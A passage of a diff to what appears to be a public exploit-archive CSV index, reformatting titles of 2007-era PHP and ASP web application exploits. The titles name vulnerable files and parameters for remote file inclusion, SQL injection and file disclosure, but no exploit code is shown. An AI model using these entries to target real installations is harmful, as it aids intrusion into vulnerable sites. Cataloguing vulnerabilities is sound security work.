'index.php' Remote File Inclusion",2007-04-18,Dj7xpl,php,webapps,0 3761,platforms/php/webapps/3761.txt,"Mozzers SubSystem final - 'subs.php' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 -3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - (process.php update) Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 +3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - 'process.php update' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 - (root) Remote File Inclusion",2007-04-18,GoLd_M,php,webapps,0 3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - 'force_download.php' Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 3765,platforms/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 -3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - (error.asp id) SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 +3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - 'error.asp id' SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion",2007-04-21,GoLd_M,php,webapps,0 -3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - (imgsrv.php ac) Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 +3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 - 'imgsrv.php ac' Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps,0 3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - SQL Injection",2007-04-22,Dj7xpl,php,webapps,0 3775,platforms/php/webapps/3775.txt,"Maran PHP Forum - 'forum_write.php' Remote Code Execution",2007-04-22,Dj7xpl,php,webapps,0 3778,platforms/php/webapps/3778.txt,"WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion",2007-04-23,g00ns,php,webapps,0 3780,platforms/php/webapps/3780.pl,"MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection",2007-04-23,0x86,php,webapps,0 -3781,platforms/php/webapps/3781.txt,"Joomla! 1.5.0 Beta - (pcltar.php) Remote File Inclusion",2007-04-23,Omid,php,webapps,0 -3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - (navigator_ok.php asolute) Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 +3781,platforms/php/webapps/3781.txt,"Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion",2007-04-23,Omid,php,webapps,0 +3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - 'navigator_ok.php asolute' Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 3785,platforms/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusion",2007-04-24,"ThE TiGeR",php,webapps,0 3794,platforms/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - (dnld) Remote File Disclosure",2007-04-24,GoLd_M,php,webapps,0 3795,platforms/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion",2007-04-24,DamaR,php,webapps,0 -3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - (loading.php path_include) Remote File Inclusion",2007-04-24,kezzap66345,php,webapps,0 -3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - (file.php) Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 -3800,platforms/php/webapps/3800.txt,"Ext 1.0 - (feed-proxy.php feed) Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 -3802,platforms/php/webapps/3802.txt,"PHPBandManager 0.8 - (index.php pg) Remote File Inclusion",2007-04-26,koray,php,webapps,0 -3803,platforms/php/webapps/3803.txt,"PHPOracleView - (include_all.inc.php page_dir) Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 +3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - 'loading.php path_include' Remote File Inclusion",2007-04-24,kezzap66345,php,webapps,0 +3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 +3800,platforms/php/webapps/3800.txt,"Ext 1.0 - 'feed-proxy.php feed' Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 +3802,platforms/php/webapps/3802.txt,"PHPBandManager 0.8 - 'index.php pg' Remote File Inclusion",2007-04-26,koray,php,webapps,0 +3803,platforms/php/webapps/3803.txt,"PHPOracleView - 'include_all.inc.php page_dir' Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 - (doc_root) Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps,0 -3806,platforms/php/webapps/3806.txt,"EsForum 3.0 - (forum.php idsalon) SQL Injection",2007-04-26,"ilker Kandemir",php,webapps,0 +3806,platforms/php/webapps/3806.txt,"EsForum 3.0 - 'forum.php idsalon' SQL Injection",2007-04-26,"ilker Kandemir",php,webapps,0 3809,platforms/php/webapps/3809.txt,"burnCMS 0.2 - (root) Remote File Inclusion",2007-04-27,GoLd_M,php,webapps,0 3813,platforms/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps,0 3814,platforms/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps,0 3816,platforms/php/webapps/3816.php,"TCExam 4.0.011 - (SessionUserLang) Shell Injection",2007-04-29,rgod,php,webapps,0 -3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - (fileview.php album) Local File Inclusion",2007-04-29,DNX,php,webapps,0 -3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - (index.php show) Remote File Inclusion",2007-04-29,kezzap66345,php,webapps,0 -3820,platforms/php/webapps/3820.php,"psipuss 1.0 - (editusers.php) Remote Change Admin Password",2007-04-30,Dj7xpl,php,webapps,0 +3817,platforms/php/webapps/3817.txt,"Imageview 5.3 - 'fileview.php album' Local File Inclusion",2007-04-29,DNX,php,webapps,0 +3818,platforms/php/webapps/3818.htm,"The Merchant 2.2.0 - 'index.php show' Remote File Inclusion",2007-04-29,kezzap66345,php,webapps,0 +3820,platforms/php/webapps/3820.php,"psipuss 1.0 - 'editusers.php' Remote Change Admin Password",2007-04-30,Dj7xpl,php,webapps,0 3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table 1.43 - (inc_dir) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube 1.43 - (wpPATH) Remote File Inclusion",2007-05-01,K-159,php,webapps,0 -3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0 +3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php form' Local File Inclusion",2007-05-01,ettee,php,webapps,0 3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0 -3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 +3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,php,webapps,0 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 -3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - (header.php ote_home) Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 +3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - 'header.php ote_home' Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - 'bus' Parameter SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3840,platforms/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 -3843,platforms/php/webapps/3843.txt,"Censura 1.15.04 - (censura.php vendorid) SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 -3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 - (common.php locale) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 -3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 -3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3843,platforms/php/webapps/3843.txt,"Censura 1.15.04 - 'censura.php vendorid' SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 - 'common.php locale' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - 'ajax_listado.php urlModulo' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3848,platforms/php/webapps/3848.txt,"workbench 0.11 - 'header.php path' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0 3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - 'debug_show.php' SQL Injection",2007-05-04,rgod,php,webapps,0 3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 @@ -17655,43 +17658,43 @@ id,file,description,date,author,platform,type,port 3857,platforms/php/webapps/3857.txt,"vm Watermark for Gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 3858,platforms/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution",2007-05-05,DarkFig,php,webapps,0 3859,platforms/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass",2007-05-05,Dj7xpl,php,webapps,0 -3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - (cms2.php s_dir) Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 -3861,platforms/php/webapps/3861.txt,"NoAh 0.9 pre 1.2 - (mfa_theme.php) Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 +3860,platforms/php/webapps/3860.txt,"PHPtree 1.3 - 'cms2.php s_dir' Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 +3861,platforms/php/webapps/3861.txt,"NoAh 0.9 pre 1.2 - 'mfa_theme.php' Remote File Inclusion",2007-05-06,kezzap66345,php,webapps,0 3862,platforms/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 - SQL Injection",2007-05-06,"Mehmet Ince",php,webapps,0 3863,platforms/php/webapps/3863.txt,"Wikivi5 - 'show.php sous_rep' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 3864,platforms/php/webapps/3864.txt,"Friendly 1.0d1 - (friendly_path) Remote File Inclusion",2007-05-06,GoLd_M,php,webapps,0 3865,platforms/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - (RESPATH) Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0 -3867,platforms/php/webapps/3867.pl,"ACGVAnnu 1.3 - (acgv.php rubrik) Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 +3867,platforms/php/webapps/3867.pl,"ACGVAnnu 1.3 - 'acgv.php rubrik' Local File Inclusion",2007-05-07,BeyazKurt,php,webapps,0 3868,platforms/php/webapps/3868.txt,"DynamicPAD 1.02.18 - (HomeDir) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 - (beryliumroot) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 -3870,platforms/php/webapps/3870.txt,"LaVague 0.3 - (printbar.php views_path) Remote File Inclusion",2007-05-08,kezzap66345,php,webapps,0 +3870,platforms/php/webapps/3870.txt,"LaVague 0.3 - 'printbar.php views_path' Remote File Inclusion",2007-05-08,kezzap66345,php,webapps,0 3874,platforms/php/webapps/3874.txt,"CGX 20050314 - (pathCGX) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - (path_local) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 -3878,platforms/php/webapps/3878.txt,"Miplex2 - (SmartyFU.class.php) Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 +3878,platforms/php/webapps/3878.txt,"Miplex2 - 'SmartyFU.class.php' Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3884,platforms/php/webapps/3884.txt,"aForum 1.32 - (CommonAbsDir) Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps,0 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 -3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection",2007-05-09,Silentz,php,webapps,0 -3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection",2007-05-09,Silentz,php,webapps,0 +3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php news_id' SQL Injection",2007-05-09,Silentz,php,webapps,0 +3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php search' SQL Injection",2007-05-09,Silentz,php,webapps,0 3894,platforms/php/webapps/3894.txt,"Original 0.11 - config.inc.php x[1] Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 -3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - (PHPThumb.php src) Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 -3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - (galeria.php lang2) Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0 +3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - 'PHPThumb.php src' Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 +3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - 'galeria.php lang2' Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0 3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution",2007-05-11,Dj7xpl,php,webapps,0 3905,platforms/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - 'W1L3D4_bolum.asp' SQL Injection",2007-05-11,gsy,asp,webapps,0 -3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion",2007-05-12,Dj7xpl,php,webapps,0 -3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - (page.php) SQL Injection",2007-05-12,gsy,php,webapps,0 +3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - 'block.php Include' Remote File Inclusion",2007-05-12,Dj7xpl,php,webapps,0 +3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - 'page.php' SQL Injection",2007-05-12,gsy,php,webapps,0 3908,platforms/php/webapps/3908.txt,"YAAP 1.5 - __autoload() Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps,0 -3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 - (splash.lang.php) Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps,0 +3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 - 'splash.lang.php' Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps,0 3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 - 'id' SQL Injection",2007-05-14,CyberGhost,php,webapps,0 -3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - (archshow.asp var) SQL Injection",2007-05-13,gsy,asp,webapps,0 +3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - 'archshow.asp var' SQL Injection",2007-05-13,gsy,asp,webapps,0 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) Remote File Inclusion",2007-05-13,Mogatil,php,webapps,0 3918,platforms/php/webapps/3918.txt,"phpAtm 1.30 - (downloadfile) Remote File Disclosure",2007-05-13,Ali.Mohajem,php,webapps,0 -3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - (prepend_adm.php) Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 -3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 +3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 +3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - 'newsadmin.php action' Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Parameter Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 @@ -17702,12 +17705,12 @@ id,file,description,date,author,platform,type,port 3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0 -3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0 +3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - 'question.php questionref' SQL Injection",2007-05-16,Silentz,php,webapps,0 3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0 -3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 -3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 +3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - 'template_csv.php' Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 +3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - 'index.php lang' Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - 'mp3playlist.php' SQL Injection",2007-05-20,NeoMorphS,php,webapps,0 3956,platforms/php/webapps/3956.php,"Alstrasoft e-Friends 4.21 - Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 @@ -17721,20 +17724,20 @@ id,file,description,date,author,platform,type,port 3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution",2007-05-23,Dj7xpl,php,webapps,0 3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 -3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - (my_progress.php course) SQL Injection",2007-05-23,Silentz,php,webapps,0 -3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection",2007-05-24,Silentz,php,webapps,0 +3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - 'my_progress.php course' SQL Injection",2007-05-23,Silentz,php,webapps,0 +3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - 'courseLog.php scormcontopen' SQL Injection",2007-05-24,Silentz,php,webapps,0 3981,platforms/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection",2007-05-24,Kacper,php,webapps,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0 -3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 +3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - 'class.php root' Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps,0 -3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - (user.php id) SQL Injection",2007-05-25,Silentz,php,webapps,0 +3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - 'user.php id' SQL Injection",2007-05-25,Silentz,php,webapps,0 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - (root) Remote File Inclusion",2007-05-25,"Cold Zero",php,webapps,0 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a - (root_prefix) Remote File Inclusion",2007-05-25,DeltahackingTEAM,php,webapps,0 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b - (pachtofile) Remote File Inclusion",2007-05-25,"Mehmet Ince",php,webapps,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion",2007-05-26,"ThE TiGeR",php,webapps,0 -3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - (admin.php site_url) Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 +3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - 'admin.php site_url' Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b - (securelib) Remote File Inclusion",2007-05-27,"ThE TiGeR",php,webapps,0 -3998,platforms/php/webapps/3998.php,"Fundanemt 2.2.0 - (spellcheck.php) Remote Code Execution",2007-05-27,Kacper,php,webapps,0 +3998,platforms/php/webapps/3998.php,"Fundanemt 2.2.0 - 'spellcheck.php' Remote Code Execution",2007-05-27,Kacper,php,webapps,0 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a - (skin) Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 4000,platforms/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0 4003,platforms/php/webapps/4003.sh,"Joomla! Component Phil-a-Form 1.2.0.0 - SQL Injection",2007-05-28,CypherXero,php,webapps,0 @@ -17749,7 +17752,7 @@ id,file,description,date,author,platform,type,port 4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,php,webapps,0 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0 -4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0 +4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0 4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0 4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - index.php 'epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps,0 4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution",2007-06-06,Silentz,php,webapps,0 @@ -17761,71 +17764,71 @@ id,file,description,date,author,platform,type,port 4055,platforms/php/webapps/4055.htm,"PHP Real Estate Classifieds - Remote File Inclusion",2007-06-09,"not sec group",php,webapps,0 4057,platforms/asp/webapps/4057.txt,"GeometriX Download Portal - 'down_indir.asp id' SQL Injection",2007-06-09,CyberGhost,asp,webapps,0 4059,platforms/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution",2007-06-11,CorryL,php,webapps,0 -4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - (low.php topic) SQL Injection",2007-06-12,Silentz,php,webapps,0 +4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - 'low.php topic' SQL Injection",2007-06-12,Silentz,php,webapps,0 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion",2007-06-12,Sp[L]o1T,php,webapps,0 4064,platforms/php/webapps/4064.txt,"XOOPS Module horoscope 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,php,webapps,0 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection - 'modify.php' Remote File Inclusion",2007-06-13,Sp[L]o1T,php,webapps,0 4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - (spaw_root) Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 4070,platforms/php/webapps/4070.txt,"XOOPS Module cjay content 3 - Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 -4071,platforms/php/webapps/4071.txt,"Sitellite CMS 4.2.12 - (559668.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 -4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 - (PHPhtml.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 -4074,platforms/php/webapps/4074.txt,"PHPMyInventory 2.8 - (global.inc.php) Remote File Inclusion",2007-06-16,o0xxdark0o,php,webapps,0 +4071,platforms/php/webapps/4071.txt,"Sitellite CMS 4.2.12 - '559668.php' Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 +4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 - 'PHPhtml.php' Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 +4074,platforms/php/webapps/4074.txt,"PHPMyInventory 2.8 - 'global.inc.php' Remote File Inclusion",2007-06-16,o0xxdark0o,php,webapps,0 4075,platforms/php/webapps/4075.txt,"YourFreeScreamer 1.0 - 'serverPath' Remote File Inclusion",2007-06-17,Crackers_Child,php,webapps,0 4076,platforms/php/webapps/4076.php,"MiniBB 2.0.5 - 'Language' Local File Inclusion",2007-06-17,Dj7xpl,php,webapps,0 4078,platforms/php/webapps/4078.php,"Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve 